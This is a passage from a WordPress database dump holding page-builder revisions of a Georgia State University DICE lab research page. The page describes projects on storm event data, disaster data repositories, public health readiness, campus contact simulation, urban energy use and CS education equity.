style-local-126-c17\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n                      documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n                      of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n                      two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n            <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n            <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n            <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-364 style-local-126-c24\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">The DICE Data Repository </h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n                      of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n                      ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp;\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n            <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-384 style-local-126-c29\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">ORPHEUS</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n                      the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n                      can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n            <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n            <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n            <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-350 style-local-126-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">GSU Contact Network Prediction</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects&nbsp;our approach to this\n                      research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n                      to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n                      account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n                      to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c38\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-866 style-local-126-c38 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"126-c39\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-867 style-local-126-c39 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-868-outer style-local-126-c40-outer\">\n            <div data-colibri-id=\"126-c40\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-868 style-local-126-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-869-outer style-local-126-c41-outer\">\n            <div data-colibri-id=\"126-c41\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-869 style-local-126-c41 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c44\" class=\"h-text h-text-component style-872 style-local-126-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school\n                      districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of\n                      demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes,\n                      and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 11:14:23','2023-09-29 15:14:23','',126,'https://gsudice.dataconn.net/?p=1535',0,'revision','',0),(1541,1,'2023-09-29 11:15:56','2023-09-29 15:15:56','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-2.jpg','cropped-tornado-2.jpg','','inherit','open','closed','','cropped-tornado-2-jpg','','','2023-09-29 11:15:56','2023-09-29 15:15:56','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-tornado-2.jpg',0,'attachment','image/jpeg',0),(1542,1,'2023-09-29 11:16:20','2023-09-29 15:16:20','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings  to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events &amp; corresponding response and recovery efforts.&nbsp; <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"ORPHEUS\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects&nbsp;our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c40\",\"parentId\":\"126-c39\",\"partialId\":126,\"styleRef\":868,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}}}}},\"id\":\"126-c41\",\"parentId\":\"126-c39\",\"partialId\":126,\"children\":[{\"name\":\"hop-text\",\"parentId\":\"126-c41\",\"index\":2,\"id\":\"126-c44\",\"partialId\":126,\"styleRef\":872,\"type\":\"content\",\"props\":{\"content\":\"<p>The goal of broadening participation in computing (BPC) must address inequities in access to preparatory CS training at the K-12 level. Inequitable allocation of resources follows racial, ethnic, and socio-economic divides across school districts leading to disparate opportunities of early access to CS education. Considering the multitude of factors that contribute to a risk of access to CS education, the goal of this project is to determine if a combination of demographic, socio-economic, and school enrollment factors can be used to locate Racially Inequitable Computer Science (RICS) deserts. RICS Deserts will be used to determine strategic locations to place resources (e.g. AP classes, and CS teachers) or interventions (e.g. summer camps, after school programs, student clubs) to achieve greatest impact. <\\/p>\"}}],\"styleRef\":869,\"type\":\"content\"}],\"id\":\"126-c39\",\"parentId\":\"126-c38\",\"partialId\":126,\"styleRef\":867,\"type\":\"content\"}],\"id\":\"126-c38\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":866,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 11:16:20','2023-09-29 15:16:20','',438,'https://gsudice.dataconn.net/?p=1542',0,'revision','',0),(1543,1,'2023-09-29 11:16:20','2023-09-29 15:16:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n            <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n            <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-392 style-local-126-c36\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Urban Scale Energy Assessments</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n                      in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n                      of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n                      patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n                      propose a plan for grid distribution optimized for human-centric usage and need.</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-fluid-container\">\n      <!---->\n      <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 